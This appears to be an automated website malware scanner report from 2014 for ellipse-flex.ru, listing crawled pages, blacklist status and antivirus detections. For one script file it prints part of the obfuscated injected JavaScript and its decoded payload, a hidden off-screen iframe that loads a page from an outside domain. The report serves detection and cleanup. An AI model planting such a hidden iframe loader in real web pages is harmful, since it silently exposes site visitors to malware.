New scan:

Malware Scanner report for ellipse-flex.ru

Malicious/Suspicious/Total urls checked
1/0/26
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "ellipse-flex.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ellipse-flex.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ellipse-flex.ru/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.ellipse-flex.ru/
200 OK
Content-Length: 9629
Content-Type: text/html
clean
http://www.ellipse-flex.ru/scripts/base.js
200 OK
Content-Length: 7013
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function bobnilagun(){
var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome/32','Chrom
... 2232 bytes are skipped ...
p;i<d.forms.length;i++) x=d.forms[i][n];
for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
if(!x && d.getElementById) x=d.getElementById(n); return x;
}
function MM_swapImage() { var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}
;;;;;;;;;;;;;;;;;;;;;;;;;;;

Decoded script:


<iframe src=http://tekpath.ru/idea.html?members style="position:absolute;left:-1200px;top:-1200px;" height="115" width="115"></iframe>

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
DrWeb
JS.IFrame.566
Fortinet
JS/IFrame.XX!tr
Sophos
Troj/JSRedir-LH

http://www.ellipse-flex.ru/index.php
200 OK
Content-Length: 9629
Content-Type: text/html
clean
http://www.ellipse-flex.ru/the_company
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Sep 2014 23:01:27 GMT
Location: http://www.ellipse-flex.ru/the_company/
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Content-Length: 247
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ellipse-flex.ru/the_company/
200 OK
Content-Length: 10456
Content-Type: text/html
clean
http://www.ellipse-flex.ru/treatment_areas
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Sep 2014 23:01:27 GMT
Location: http://www.ellipse-flex.ru/treatment_areas/
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Content-Length: 251
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ellipse-flex.ru/treatment_areas/
200 OK
Content-Length: 11672
Content-Type: text/html
clean
http://www.ellipse-flex.ru/devices
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Sep 2014 23:01:27 GMT
Location: http://www.ellipse-flex.ru/devices/
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Content-Length: 243
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ellipse-flex.ru/devices/
200 OK
Content-Length: 9541
Content-Type: text/html
clean
http://www.ellipse-flex.ru/ellipse_for_physicians
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Sep 2014 23:01:28 GMT
Location: http://www.ellipse-flex.ru/ellipse_for_physicians/
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Content-Length: 258
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ellipse-flex.ru/ellipse_for_physicians/
200 OK
Content-Length: 8644
Content-Type: text/html
clean
http://www.ellipse-flex.ru/ellipse_for_beauticians
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Sep 2014 23:01:28 GMT
Location: http://www.ellipse-flex.ru/ellipse_for_beauticians/
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Content-Length: 259
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ellipse-flex.ru/ellipse_for_beauticians/
200 OK
Content-Length: 8126
Content-Type: text/html
clean
http://www.ellipse-flex.ru/news
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Sep 2014 23:01:28 GMT
Location: http://www.ellipse-flex.ru/news/
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Content-Length: 240
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ellipse-flex.ru/news/
200 OK
Content-Length: 7919
Content-Type: text/html
clean
http://www.ellipse-flex.ru/contact
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Sep 2014 23:01:29 GMT
Location: http://www.ellipse-flex.ru/contact/
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Content-Length: 243
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ellipse-flex.ru/contact/
200 OK
Content-Length: 6949
Content-Type: text/html
clean
http://www.ellipse-flex.ru/contact/how_to_find_us
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Sep 2014 23:01:29 GMT
Location: http://www.ellipse-flex.ru/contact/how_to_find_us/
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Content-Length: 258
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ellipse-flex.ru/contact/how_to_find_us/
200 OK
Content-Length: 7148
Content-Type: text/html
clean
http://www.ellipse-flex.ru/site_map/
200 OK
Content-Length: 13163
Content-Type: text/html
clean
http://www.ellipse-flex.ru/the_company/business_mission
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Sep 2014 23:01:29 GMT
Location: http://www.ellipse-flex.ru/the_company/business_mission/
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Content-Length: 264
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ellipse-flex.ru/the_company/business_mission/
200 OK
Content-Length: 9050
Content-Type: text/html
clean
http://www.ellipse-flex.ru/the_company/market_trends
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Sep 2014 23:01:29 GMT
Location: http://www.ellipse-flex.ru/the_company/market_trends/
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Content-Length: 261
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ellipse-flex.ru/the_company/market_trends/
200 OK
Content-Length: 8916
Content-Type: text/html
clean
http://www.ellipse-flex.ru/the_company/science_focus
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Sep 2014 23:01:30 GMT
Location: http://www.ellipse-flex.ru/the_company/science_focus/
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Content-Length: 261
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ellipse-flex.ru/the_company/science_focus/
200 OK
Content-Length: 9709
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: ellipse-flex.ru

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ellipse-flex.ru
Referer: http://www.google.com/search?q=ellipse-flex.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.